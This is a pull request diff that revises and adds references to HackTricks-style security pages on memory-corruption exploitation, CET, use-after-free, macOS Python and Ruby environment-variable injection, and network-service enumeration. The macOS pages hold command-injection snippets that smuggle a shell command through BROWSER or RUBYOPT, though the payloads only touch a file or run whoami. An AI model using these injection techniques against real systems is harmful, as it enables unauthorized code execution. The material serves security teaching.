### PR TITLE
Audit references across 50 security pages

### DIFF
--- a/src/binary-exploitation/arbitrary-write-2-exec/README.md
+++ b/src/binary-exploitation/arbitrary-write-2-exec/README.md
@@ -1,3 +1,13 @@
-# Arbitrary Write 2 Exec
+# Arbitrary Write to Code Execution
+
+{{#include ../../banners/hacktricks-training.md}}
+
+A write-what-where primitive lets an attacker place a chosen value at a chosen memory address. Turning that primitive into code execution usually means overwriting data that the process will later use for control flow, such as a function pointer, an exit handler, or a writable relocation entry. The available target depends on the binary's architecture, enabled mitigations, linked libraries, and the point at which the write occurs.<sup>[[1]](#references)</sup>
+
+Before choosing a technique, determine the write's size and repeatability, identify writable addresses, and confirm which candidate target will be dereferenced after the overwrite. The pages in this section cover common targets, including the GOT/PLT, `.fini_array`, `atexit()` handlers, historical glibc hooks, and application-specific callbacks.
+
+## References
+
+- [1] [MITRE CWE-123: Write-what-where Condition](https://cwe.mitre.org/data/definitions/123.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/binary-exploitation/array-indexing.md
+++ b/src/binary-exploitation/array-indexing.md
@@ -4,24 +4,21 @@
 
 ## Basic Information
 
-This category includes all vulnerabilities that occur because it is possible to overwrite certain data through errors in the handling of indexes in arrays. It's a very wide category with no specific methodology as the exploitation mechanism relays completely on the conditions of the vulnerability.
+Array-indexing vulnerabilities occur when a program fails to validate an index before using it to read or write an array. An out-of-bounds access may disclose memory, corrupt adjacent objects, or alter control data. The exploitation strategy depends on the array layout, the attacker's control over the index and value, and the binary's mitigations.<sup>[[5]](#references)</sup>
 
-However he you can find some nice **examples**:
+## Examples
 
-- [https://guyinatuxedo.github.io/11-index/swampctf19_dreamheaps/index.html](https://guyinatuxedo.github.io/11-index/swampctf19_dreamheaps/index.html)<sup>[[1]](#references)</sup>
-  - There are **2 colliding arrays**, one for **addresses** where data is stored and one with the **sizes** of that data. It's possible to overwrite one from the other, enabling to write an arbitrary address indicating it as a size. This allows to write the address of the `free` function in the GOT table and then overwrite it with the address to `system`, and call free from a memory with `/bin/sh`.<sup>[[1]](#references)</sup>
-- [https://guyinatuxedo.github.io/11-index/csaw18_doubletrouble/index.html](https://guyinatuxedo.github.io/11-index/csaw18_doubletrouble/index.html)<sup>[[2]](#references)</sup>
-  - 64 bits, no nx. Overwrite a size to get a kind of buffer overflow where every thing is going to be used a double number and sorted from smallest to biggest so it's needed to create a shellcode that fulfil that requirement, taking into account that the canary shouldn't be moved from it's position and finally overwriting the RIP with an address to ret, that fulfil he previous requirements and putting the biggest address a new address pointing to the start of the stack (leaked by the program) so it's possible to use the ret to jump there.<sup>[[2]](#references)</sup>
-- [https://faraz.faith/2019-10-20-secconctf-2019-sum/](https://faraz.faith/2019-10-20-secconctf-2019-sum/)<sup>[[3]](#references)</sup>
-  - 64bits, no relro, canary, nx, no pie. There is an off-by-one in an array in the stack that allows to control a pointer granting WWW (it write the sum of all the numbers of the array in the overwritten address by the of-by-one in the array). The stack is controlled so the GOT `exit` address is overwritten with `pop rdi; ret`, and in the stack is added the address to `main` (looping back to `main`). The a ROP chain to leak the address of put in the GOT using puts is used (`exit` will be called so it will call `pop rdi; ret` therefore executing this chain in the stack). Finally a new ROP chain executing ret2lib is used.<sup>[[3]](#references)</sup>
-- [https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html](https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html)<sup>[[4]](#references)</sup>
-  - 32 bit, no relro, no canary, nx, pie. Abuse a bad indexing to leak addresses of libc and heap from the stack. Abuse the buffer overflow o do a ret2lib calling `system('/bin/sh')` (the heap address is needed to bypass a check).<sup>[[4]](#references)</sup>
+- **SwampCTF 2019 - dreamheaps:** Two arrays store allocation addresses and sizes. Their indexes overlap, so an out-of-bounds operation can turn a size entry into an attacker-chosen pointer. The exploit redirects a write to `free@GOT`, replaces it with `system`, and frees a buffer containing `/bin/sh`.<sup>[[1]](#references)</sup>
+- **CSAW 2018 - doubletrouble:** A 64-bit binary with an executable stack sorts attacker-supplied doubles. The exploit converts instruction bytes and addresses into sortable floating-point values, preserves the canary's position, and overwrites the return path so execution reaches shellcode on the leaked stack.<sup>[[2]](#references)</sup>
+- **SECCON CTF 2019 - sum:** An off-by-one stack-array index corrupts a pointer used as the destination for a calculated sum, producing a constrained write-what-where primitive. The exploit uses repeated writes and ROP stages to redirect `exit`, leak a libc address, and finally call `system` through a ret2libc chain.<sup>[[3]](#references)</sup>
+- **TUCTF - guestbook:** A negative/out-of-range index leaks libc and heap pointers from the stack. A separate buffer overflow then uses those disclosures to build a 32-bit ret2libc call to `system("/bin/sh")` while satisfying an application check that requires the heap address.<sup>[[4]](#references)</sup>
 
 ## References
 
-- [1] [Nightmare: SwampCTF 2019 – dreamheaps (colliding index arrays)](https://guyinatuxedo.github.io/11-index/swampctf19_dreamheaps/index.html)
-- [2] [Nightmare: CSAW 2018 – doubletrouble](https://guyinatuxedo.github.io/11-index/csaw18_doubletrouble/index.html)
-- [3] [SECCON CTF 2019 – sum write-up (faraz.faith)](https://faraz.faith/2019-10-20-secconctf-2019-sum/)
-- [4] [Nightmare: ret2system – tu_guestbook](https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html)
+- [1] [Nightmare - SwampCTF 2019 dreamheaps](https://guyinatuxedo.github.io/11-index/swampctf19_dreamheaps/index.html)
+- [2] [Nightmare - CSAW 2018 doubletrouble](https://guyinatuxedo.github.io/11-index/csaw18_doubletrouble/index.html)
+- [3] [Faraz - SECCON CTF 2019 sum write-up](https://faraz.faith/2019-10-20-secconctf-2019-sum/)
+- [4] [Nightmare - TUCTF guestbook](https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html)
+- [5] [MITRE CWE-129 - Improper validation of array index](https://cwe.mitre.org/data/definitions/129.html)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md
@@ -4,23 +4,29 @@
 
 ## Control Flow Enforcement Technology (CET)
 
-**CET** is a security feature implemented at the hardware level, designed to thwart common control-flow hijacking attacks such as **Return-Oriented Programming (ROP)** and **Jump-Oriented Programming (JOP)**. These types of attacks manipulate the execution flow of a program to execute malicious code or to chain together pieces of benign code in a way that performs a malicious action.
+Intel **Control-flow Enforcement Technology (CET)** is a set of processor features intended to make control-flow hijacking techniques such as return-oriented programming (ROP) and jump-oriented programming (JOP) harder. CET must also be supported and enabled by the operating system, loader, and application; CPU support alone does not protect a process.<sup>[[1]](#references)</sup><sup>[[2]](#references)</sup>
 
-CET introduces two main features: **Indirect Branch Tracking (IBT)** and **Shadow Stack**.
+CET provides two complementary mechanisms:<sup>[[1]](#references)</sup>
 
-- **IBT** ensures that indirect jumps and calls are made to valid targets, which are marked explicitly as legal destinations for indirect branches. This is achieved through the use of a new instruction set that marks valid targets, thus preventing attackers from diverting the control flow to arbitrary locations.
-- **Shadow Stack** is a mechanism that provides integrity for return addresses. It keeps a secured, hidden copy of return addresses separate from the regular call stack. When a function returns, the return address is validated against the shadow stack, preventing attackers from overwriting return addresses on the stack to hijack the control flow.
+- **Indirect Branch Tracking (IBT)** requires an indirect `CALL` or `JMP` to land on an `ENDBR` instruction inserted at intended targets. This reduces the set of usable indirect-branch targets and constrains JOP/COP attacks.
+- **Shadow Stack (SHSTK)** maintains a protected second copy of return addresses. On a return, the processor compares the normal-stack address with the shadow-stack address and raises a control-protection fault if they differ.
 
 ## Shadow Stack
 
-The **shadow stack** is a **dedicated stack used solely for storing return addresses**. It works alongside the regular stack but is protected and hidden from normal program execution, making it difficult for attackers to tamper with. The primary goal of the shadow stack is to ensure that any modifications to return addresses on the conventional stack are detected before they can be used, effectively mitigating ROP attacks.
+The shadow stack is a separate memory region used for control-transfer state. Ordinary application stores cannot modify it; the processor writes a return address to both stacks when executing a call and checks both copies on return. Specialized instructions and operating-system support handle legitimate updates such as signal delivery or context restoration.<sup>[[1]](#references)</sup><sup>[[2]](#references)</sup>
 
 ## How CET and Shadow Stack Prevent Attacks
 
-**ROP and JOP attacks** rely on the ability to hijack the control flow of an application by leveraging vulnerabilities that allow them to overwrite pointers or return addresses on the stack. By directing the flow to sequences of existing code gadgets or return-oriented programming gadgets, attackers can execute arbitrary code.
+ROP chains commonly corrupt saved return addresses, while JOP/COP chains redirect indirect jumps or calls. CET addresses these paths separately:
 
-- **CET's IBT** feature makes these attacks significantly harder by ensuring that indirect branches can only jump to addresses that have been explicitly marked as valid targets. This makes it impossible for attackers to execute arbitrary gadgets spread across the binary.
-- The **shadow stack**, on the other hand, ensures that even if an attacker can overwrite a return address on the normal stack, the **discrepancy will be detected** when comparing the corrupted address with the secure copy stored in the shadow stack upon returning from a function. If the addresses don't match, the program can terminate or take other security measures, preventing the attack from succeeding.
+- **IBT** blocks indirect transfers to locations that do not begin with the required landing-pad instruction. It reduces the available gadget space but does not prove that every permitted target is safe.
+- **Shadow stack** detects a corrupted return address before the processor uses it. The resulting fault lets the operating system terminate or otherwise handle the offending process.<sup>[[1]](#references)</sup><sup>[[2]](#references)</sup>
+
+CET is therefore a mitigation, not a substitute for memory safety. Its practical coverage depends on which CET features the CPU and operating system support and whether the binary and runtime enable them.<sup>[[2]](#references)</sup>
+
+## References
+
+- [1] [Intel - A technical look at Control-flow Enforcement Technology](https://www.intel.com/content/www/us/en/developer/articles/technical/technical-look-control-flow-enforcement-technology.html)
+- [2] [Linux kernel documentation - Control-flow Enforcement Technology shadow stack](https://docs.kernel.org/next/x86/shstk.html)
 
 {{#include ../../banners/hacktricks-training.md}}
-

--- a/src/binary-exploitation/libc-heap/heap-memory-functions/README.md
+++ b/src/binary-exploitation/libc-heap/heap-memory-functions/README.md
@@ -2,7 +2,12 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-##
+The C allocation interface centers on `malloc`, `calloc`, `realloc`, and `free`: `malloc` reserves an uninitialized block, `calloc` allocates and clears an array, `realloc` changes an existing allocation's size, and `free` releases an allocation. In glibc, these calls are backed by allocator internals whose metadata and consistency checks are important when studying heap corruption.<sup>[[1]](#references)</sup>
+
+The pages in this section describe the relevant allocation and release paths, the `unlink` operation, and security checks performed by heap-management functions. Allocator behavior changes across glibc versions, so verify the target's exact library build before relying on a particular data structure or exploitation technique.<sup>[[1]](#references)</sup>
+
+## References
+
+- [1] [GNU C Library Manual - Summary of `malloc`-Related Functions](https://sourceware.org/glibc/manual/latest/html_node/Summary-of-Malloc.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-

--- a/src/binary-exploitation/libc-heap/use-after-free/README.md
+++ b/src/binary-exploitation/libc-heap/use-after-free/README.md
@@ -1,21 +1,23 @@
-# Use After Free
+# Use-After-Free
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
-As the name implies, this vulnerability occurs when a program **stores some space** in the heap for an object, **writes** some info there, **frees** it apparently because it's not needed anymore and then **accesses it again**.
+A use-after-free (UAF) occurs when a program continues to use a pointer or reference after the referenced allocation has been freed. The stale reference is often called a _dangling pointer_. If the allocator later reuses that region, the stale pointer may refer to data owned by a different object.<sup>[[1]](#references)</sup>
 
-The problem here is that it's not ilegal (there **won't be errors**) when a **freed memory is accessed**. So, if the program (or the attacker) managed to **allocate the freed memory and store arbitrary data**, when the freed memory is accessed from the initial pointer that **data would be have been overwritten** causing a **vulnerability that will depends on the sensitivity of the data** that was stored original (if it was a pointer of a function that was going to be be called, an attacker could know control it).
+Accessing freed memory is invalid, but it does not necessarily fail immediately. Depending on the operation and the allocator state, a UAF may cause a crash, disclose memory, corrupt a live object, or enable code execution. Exploitation commonly involves reclaiming the freed region with attacker-influenced data before the program dereferences the stale pointer; overwriting a function pointer or another control-sensitive field can then redirect execution.<sup>[[1]](#references)</sup>
 
-### First Fit attack
+## First-Fit Attack
 
-A first fit attack targets the way some memory allocators, like in glibc, manage freed memory. When you free a block of memory, it gets added to a list, and new memory requests pull from that list from the end. Attackers can use this behavior to manipulate **which memory blocks get reused, potentially gaining control over them**. This can lead to "use-after-free" issues, where an attacker could **change the contents of memory that gets reallocated**, creating a security risk.\
-Check more info in:
-
+A first-fit attack uses predictable allocation selection to reclaim a freed chunk with a chosen allocation. In a UAF scenario, heap grooming can place attacker-controlled contents where the dangling pointer will later read or write. The exact behavior depends on the allocator, size class, bin state, and allocation sequence; see the dedicated page for details:
 
 {{#ref}}
 first-fit.md
 {{#endref}}
+
+## References
+
+- [1] [MITRE CWE-416 - Use After Free](https://cwe.mitre.org/data/definitions/416.html)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/crypto/ctf-misc/README.md
+++ b/src/crypto/ctf-misc/README.md
@@ -2,25 +2,21 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-Grab-bag pages that show up a lot in crypto challenges, but don’t fit neatly elsewhere.
+This section collects techniques that appear in cryptography challenges but do not fit neatly into the other categories.
 
 ## Esoteric languages
 
 ### Technique
 
-Use this when a crypto task is actually: run an esolang program and then decode what it outputs.
+Use this workflow when a challenge requires running an esoteric-language program and decoding its output.
 
 If a challenge gives you code that does not look like a standard language:
 
-- Identify the esolang (Google a distinctive token).
+- Identify the language by searching for a distinctive token or instruction sequence.
 - Use an online interpreter or a Docker image.
 - If the output is weird, look for layered encoding/compression after execution.
 
-Good starting list:<sup>[[1]](#references)</sup>
-
-{{#ref}}
-https://esolangs.org/wiki/Main_Page
-{{#endref}}
+A useful language index is the Esolang wiki.<sup>[[1]](#references)</sup>
 
 ## References
 

--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-python-applications-injection.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-python-applications-injection.md
@@ -1,19 +1,19 @@
-# macOS Python Applications Injection
+# macOS Python Application Injection
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Via `PYTHONWARNINGS` and `BROWSER` env variables
+## Via the `PYTHONWARNINGS` and `BROWSER` environment variables
 
-It's possible to alter both environment variables to execute arbitrary code whenever python is called, for example:<sup>[[1]](#references)</sup>
+If an attacker can control a Python process's environment, the combination of `PYTHONWARNINGS` and `BROWSER` can trigger command execution when Python imports the `antigravity` module while processing a crafted warning option. The technique relies on `antigravity` opening a URL with Python's `webbrowser` module, which honors the `BROWSER` environment variable.<sup>[[1]](#references)</sup>
 
 ```bash
-# Generate example python script
+# Generate an example Python script.
 echo "print('hi')" > /tmp/script.py
 
-# RCE which will generate file /tmp/hacktricks
+# Create /tmp/hacktricks through the inherited environment.
 PYTHONWARNINGS="all:0:antigravity.x:0:0" BROWSER="/bin/sh -c 'touch /tmp/hacktricks' #%s" python3 /tmp/script.py
 
-# RCE which will generate file /tmp/hacktricks bypassing "-I" injecting "-W" before the script to execute
+# With isolated mode, inject the warning rule using -W instead.
 BROWSER="/bin/sh -c 'touch /tmp/hacktricks' #%s" python3 -I -W all:0:antigravity.x:0:0 /tmp/script.py
 ```
 

--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md
@@ -4,30 +4,36 @@
 
 ## RUBYOPT
 
-Using this env variable it's possible to **add new params** to **ruby** whenever it gets executed. Although the param **`-e`** cannot be used to specify ruby code to execute, it's possible to use the params **`-I`** and **`-r`** to add a new folder to the libraries to load path and then **specify a library to load**.
+Ruby parses supported command-line switches from the `RUBYOPT` environment variable before running a script. Although Ruby rejects some switches there, `-I` can prepend a library-search directory and `-r` can require a library. A process that launches Ruby with attacker-controlled environment variables can therefore be made to load attacker-controlled Ruby code.<sup>[[1]](#references)</sup>
 
-Create the library **`inject.rb`** in **`/tmp`**:
+Create `/tmp/inject.rb`:
 
 ```ruby:inject.rb
 puts `whoami`
 ```
 
-Create anywahere a ruby script like:
+Create a benign Ruby script such as `hello.rb`:
 
 ```ruby:hello.rb
 puts 'Hello, World!'
 ```
 
-Then make an arbitrary ruby script load it with:
+Run it with a controlled `RUBYOPT` value:
 
 ```bash
 RUBYOPT="-I/tmp -rinject" ruby hello.rb
 ```
 
-Fun fact, it works even with param **`--disable-rubyopt`**:
+To disable this behavior, pass `--disable=rubyopt` (or `--disable-rubyopt`) **before** the script name:<sup>[[1]](#references)</sup>
 
 ```bash
-RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
+RUBYOPT="-I/tmp -rinject" ruby --disable=rubyopt hello.rb
 ```
+
+An option written after `hello.rb` is passed to the script in `ARGV`; it does not disable Ruby's earlier processing of `RUBYOPT`.<sup>[[1]](#references)</sup>
+
+## References
+
+- [1] [Ruby documentation - Ruby command-line options](https://ruby-doc.org/3.4/ruby/options_md.html)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.md
@@ -4,19 +4,23 @@
 
 ## Basic Information
 
-**Apple Events** are a feature in Apple's macOS that allows applications to communicate with each other. They are part of the **Apple Event Manager**, which is a component of the macOS operating system responsible for handling interprocess communication. This system enables one application to send a message to another application to request that it perform a particular operation, like opening a file, retrieving data, or executing a command.
+**Apple events** are structured interprocess messages that applications use to request operations or data from other applications. The **Apple Event Manager** provides the APIs for creating, sending, receiving, and responding to these messages.<sup>[[1]](#references)</sup>
 
-The mina daemon is `/System/Library/CoreServices/appleeventsd` which registers the service `com.apple.coreservices.appleevents`.
+On macOS, the principal broker is `/System/Library/CoreServices/appleeventsd`, which registers the `com.apple.coreservices.appleevents` Mach service. Applications that receive events register an Apple-event Mach port with this service; senders obtain the destination port through it.<sup>[[3]](#references)</sup>
 
-Every application that can receive events will checking with this daemon providing its Apple Event Mach Port. And when an app wants to send an event to to it, the app will request this port from the daemon.
-
-Sandboxed applications requires privileges like `allow appleevent-send` and `(allow mach-lookup (global-name "com.apple.coreservices.appleevents))` in order to be able to send events. Noten that entitlements like `com.apple.security.temporary-exception.apple-events` could restrict who have access to send events which will need entitlements like `com.apple.private.appleevents`.
+Sandbox rules and entitlements limit this communication. A sandbox profile needs permission to send Apple events and look up the broker's Mach service. The `com.apple.security.temporary-exception.apple-events` entitlement can further restrict a sandboxed application to named destination bundle identifiers.<sup>[[2]](#references)</sup>
 
 > [!TIP]
-> It's possible to use the env variable **`AEDebugSends`** in order to log informtion about the message sent:
+> Set the **`AEDebugSends`** environment variable to log information about Apple events sent by a process:<sup>[[3]](#references)</sup>
 >
 > ```bash
 > AEDebugSends=1 osascript -e 'tell application "iTerm" to activate'
 > ```
+
+## References
+
+- [1] [Apple Developer Documentation - Apple Event Manager](https://developer.apple.com/documentation/applicationservices/apple_event_manager)
+- [2] [Apple Developer Documentation - App Sandbox Temporary Exception Entitlements](https://developer.apple.com/library/archive/documentation/Miscellaneous/Reference/EntitlementKeyReference/Chapters/AppSandboxTemporaryExceptionEntitlements.html)
+- [3] [Mac OS X and iOS Internals - Apple-event debug environment variables](https://www.newosxbook.com/MOXiI.pdf)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md
+++ b/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md
@@ -2,28 +2,33 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-## **Protocol Information**
+## Protocol information
 
-From [Wikipedia](https://en.wikipedia.org/wiki/NDMP):
+The Network Data Management Protocol (NDMP) coordinates backup and recovery between network-attached storage and backup systems. IANA registers the service name `ndmp` on port 10000 for both TCP and UDP; the Nmap discovery scripts below target the TCP service.<sup>[[1]](#references)</sup><sup>[[2]](#references)</sup>
 
-> **NDMP**, or **Network Data Management Protocol**, is a protocol meant to transport data between network attached storage \([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\) devices and [backup](https://en.wikipedia.org/wiki/Backup) devices. This removes the need for transporting the data through the backup server itself, thus enhancing speed and removing load from the backup server.
-
-**Default port:** 10000
+**Default port:** 10000/TCP
 
 ```text
 PORT      STATE SERVICE REASON  VERSION
 10000/tcp open  ndmp    syn-ack Symantec/Veritas Backup Exec ndmp
 ```
 
-## **Enumeration**
+## Enumeration
+
+Nmap's safe discovery scripts can identify the NDMP version and, when the service permits it, list remote file systems.<sup>[[2]](#references)</sup><sup>[[3]](#references)</sup>
 
 ```bash
-nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p 10000 <IP> #Both are default scripts
+nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p 10000 <IP>
 ```
 
 ## Shodan
 
-`ndmp`
+`port:10000 ndmp`
+
+## References
+
+- [1] [IANA - Service Name and Transport Protocol Port Number Registry](https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml?search=ndmp)
+- [2] [Nmap NSE documentation - `ndmp-version`](https://nmap.org/nsedoc/scripts/ndmp-version.html)
+- [3] [Nmap NSE documentation - `ndmp-fs-info`](https://nmap.org/nsedoc/scripts/ndmp-fs-info.html)
 
 {{#include ../banners/hacktricks-training.md}}
-

--- a/src/network-services-pentesting/44818-ethernetip.md
+++ b/src/network-services-pentesting/44818-ethernetip.md
@@ -2,18 +2,20 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-## **Protocol Information**
+## Protocol information
 
-EtherNet/IP is an **industrial Ethernet networking protocol** commonly used in **industrial automation control systems**. It was developed by Rockwell Automation in the late 1990s and is managed by ODVA. The protocol ensures **multi-vendor system interoperability** and is utilized in various applications such as **water processing plants**, **manufacturing facilities**, and **utilities**. To identify an EtherNet/IP device, a query is sent to **TCP/44818** with a **list Identities Message (0x63)**.
+EtherNet/IP carries the Common Industrial Protocol (CIP) over standard Ethernet and is maintained by ODVA. Its encapsulation protocol uses TCP and UDP port 44818 for explicit messaging and discovery. The `ListIdentity` command (`0x0063`) is commonly sent as a UDP broadcast to discover devices.<sup>[[1]](#references)</sup>
 
-**Default port:** 44818 UDP/TCP
+**Default port:** 44818/TCP and 44818/UDP
 
 ```
 PORT      STATE SERVICE
 44818/tcp open  EtherNet/IP
 ```
 
-## **Enumeration**
+## Enumeration
+
+Nmap's `enip-info` script sends a request-identity packet and can return the vendor ID, device type, product name, revision, serial number, and IP address.<sup>[[2]](#references)</sup>
 
 ```bash
 nmap -n -sV --script enip-info -p 44818 <IP>
@@ -23,6 +25,11 @@ python3 -m cpppo.server.enip.list_services [--udp] [--broadcast] --list-identity
 
 ## Shodan
 
-- `port:44818 "product name"`
+`port:44818 "product name"`
+
+## References
+
+- [1] [ODVA - EtherNet/IP Developers Guide](https://www.odva.org/wp-content/uploads/2020/05/PUB00213R0_EtherNetIP_Developers_Guide.pdf)
+- [2] [Nmap NSE documentation - `enip-info`](https://nmap.org/nsedoc/scripts/enip-info.html)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/5601-pentesting-kibana.md
+++ b/src/network-services-pentesting/5601-pentesting-kibana.md
@@ -4,27 +4,34 @@
 
 ## Basic Information
 
-Kibana is known for its ability to search and visualize data within Elasticsearch, typically running on port **5601**. It serves as the interface for the Elastic Stack cluster's monitoring, management, and security functions.
+Kibana is the Elastic Stack web interface for searching, visualizing, and administering Elasticsearch data. A self-managed installation listens on `localhost:5601` by default, although both the bind address and port are configurable in `kibana.yml`.<sup>[[1]](#references)</sup>
 
-### Understanding Authentication
+## Initial checks
 
-The process of authentication in Kibana is inherently linked to the **credentials used in Elasticsearch**. If Elasticsearch has authentication disabled, Kibana can be accessed without any credentials. Conversely, if Elasticsearch is secured with credentials, the same credentials are required to access Kibana, maintaining identical user permissions across both platforms. Credentials might be found in the **/etc/kibana/kibana.yml** file. If these credentials do not pertain to the **kibana_system** user, they may offer broader access rights, as the kibana_system user's access is restricted to monitoring APIs and the .kibana index.<sup>[[1]](#references)</sup>
+- Open `/status` or use the status API to identify the deployed version and service health.<sup>[[2]](#references)</sup>
+- Determine whether the instance exposes a login form, anonymous access, or a configured SSO provider. Kibana supports multiple authentication providers backed by Elasticsearch security.<sup>[[3]](#references)</sup>
+- If local file access is already available, inspect `/etc/kibana/kibana.yml` on package installations, or `$KIBANA_HOME/config/kibana.yml` on archive installations. Do not assume Elasticsearch credentials are stored there: modern deployments can use service-account tokens or a keystore.<sup>[[1]](#references)</sup>
+- Record whether browser-to-Kibana and Kibana-to-Elasticsearch connections use TLS.
 
-### Actions Upon Access
+## Actions after authorized access
 
-Once access to Kibana is secured, several actions are advisable:<sup>[[1]](#references)</sup>
+The available features depend on the authenticated user's Elasticsearch and Kibana privileges. Within the scope of the assessment:<sup>[[3]](#references)</sup>
 
-- Exploring data from Elasticsearch should be a priority.
-- The ability to manage users, including the editing, deletion, or creation of new users, roles, or API keys, is found under Stack Management -> Users/Roles/API Keys.
-- It's important to check the installed version of Kibana for known vulnerabilities, such as the RCE vulnerability identified in versions prior to 6.6.0 ([More Info](https://insinuator.net/2021/01/pentesting-the-elk-stack/index.html#ref2)).<sup>[[2]](#references)</sup>
+- Review accessible data views, dashboards, saved searches, and developer-console access for sensitive data.
+- Inspect Stack Management for exposed users, roles, API keys, connectors, and saved objects; do not modify them unless the test explicitly permits it.
+- Compare the exact Kibana and Elasticsearch versions with Elastic security advisories. Avoid inferring vulnerability from the major version alone.
+- As a historical example, Kibana versions before 5.6.15 and 6.6.1 had an arbitrary-code-execution vulnerability in Timelion (CVE-2019-7609). Access to Timelion was a prerequisite, and Elastic's remediation was to upgrade or disable Timelion.<sup>[[4]](#references)</sup>
+- Check whether low-privileged accounts can reach administrative features or data outside their intended spaces.
 
-### SSL/TLS Considerations
+## Transport-security considerations
 
-In instances where SSL/TLS is not enabled, the potential for leaking sensitive information should be thoroughly evaluated.s
+If Kibana is reachable over plaintext HTTP, credentials, session cookies, queries, and returned data may be exposed to an on-path observer. Also verify certificate validation on Kibana's connection to Elasticsearch.<sup>[[1]](#references)</sup>
 
 ## References
 
-- [1] [Pentesting the ELK Stack - insinuator.net](https://insinuator.net/2021/01/pentesting-the-elk-stack/)
-- [2] [insinuator.net - Pentesting The Elk Stack - Index: Ref2](https://insinuator.net/2021/01/pentesting-the-elk-stack/index.html#ref2)
+- [1] [Elastic documentation - Configure Kibana](https://www.elastic.co/docs/deploy-manage/deploy/self-managed/configure-kibana)
+- [2] [Elastic documentation - Check Kibana server status](https://www.elastic.co/docs/troubleshoot/kibana/access)
+- [3] [Elastic documentation - Authentication in Kibana](https://www.elastic.co/docs/deploy-manage/users-roles/cluster-or-deployment-auth/kibana-authentication)
+- [4] [Elastic security announcement - Kibana Timelion Remote Code Execution (ESA-2019-02)](https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md
+++ b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md
@@ -1,16 +1,16 @@
-# # 2301/tcp - Pentesting Compaq/HP Insight Manager
+# 2301, 2381 - Pentesting Compaq/HP Insight Manager
 
 {{#include ../banners/hacktricks-training.md}}
 
-**Default Port:** 2301,2381
+HP System Management Homepage (SMH), commonly deployed alongside HP Systems Insight Manager, uses TCP port 2301 for HTTP/autostart and TCP port 2381 for HTTPS. Depending on the startup mode, a request to port 2301 may start the web service on port 2381 and redirect the browser.<sup>[[1]](#references)</sup>
 
-## Default passwords
+## Authentication
 
-{{#ref}}
-http://www.vulnerabilityassessment.co.uk/passwordsC.htm
-{{#endref}}
+Do not assume a universal product-level default password. HPE documentation for Windows deployments directs users to authenticate with an operating-system account; administrators on the host receive corresponding SMH privileges. Check for anonymous access and weak or reused host credentials only within the authorized scope.<sup>[[2]](#references)</sup>
 
 ## Config files
+
+File names and locations vary by product version and operating system. When local access is available, useful files to locate include:<sup>[[3]](#references)</sup>
 
 ```text
 path.properties
@@ -21,5 +21,11 @@ pg_hba.conf
 jboss-service.xml
 .namazurc
 ```
+
+## References
+
+- [1] [HPE - HP System Management Homepage 7.2 Installation Guide](https://support.hpe.com/hpesc/public/api/document/c03651448)
+- [2] [HPE - StoreEasy 1000 Storage Administrator Guide (System Management Homepage)](https://support.hpe.com/hpesc/public/api/document/c05168633)
+- [3] [HPE Support - HP Systems Insight Manager 7.1 documentation and downloads](https://support.hpe.com/hpesc/public/docDisplay?docId=c04270849&docLocale=en_US)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-rsh.md
+++ b/src/network-services-pentesting/pentesting-rsh.md
@@ -4,15 +4,15 @@
 
 ## Basic Information
 
-For authentication, **.rhosts** files along with **/etc/hosts.equiv** were utilized by **Rsh**. Authentication was dependent on IP addresses and the Domain Name System (DNS). The ease of spoofing IP addresses, notably on the local network, was a significant vulnerability.<sup>[[1]](#references)</sup>
+The remote shell service (`rsh`) historically used `/etc/hosts.equiv` and per-user `.rhosts` files to trust remote hosts and users. This host-based model depends on network and name-resolution assumptions and is vulnerable to address spoofing, especially on a local network.<sup>[[1]](#references)</sup>
 
-Moreover, it was common for the **.rhosts** files to be placed within the home directories of users, which were often located on Network File System (NFS) volumes.<sup>[[1]](#references)</sup>
+Because `.rhosts` resides in a user's home directory, an attacker who can modify that file—for example, through an exposed NFS home directory—may be able to add a trusted host or user.<sup>[[1]](#references)</sup>
 
-**Default port**: 514
+**Default port:** 514/TCP
 
 ## Login
 
-```
+```bash
 rsh <IP> <Command>
 rsh <IP> -l domain\user <Command>
 rsh domain/user@<IP> <Command>

--- a/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md
+++ b/src/network-services-pentesting/pentesting-web/artifactory-hacking-guide.md
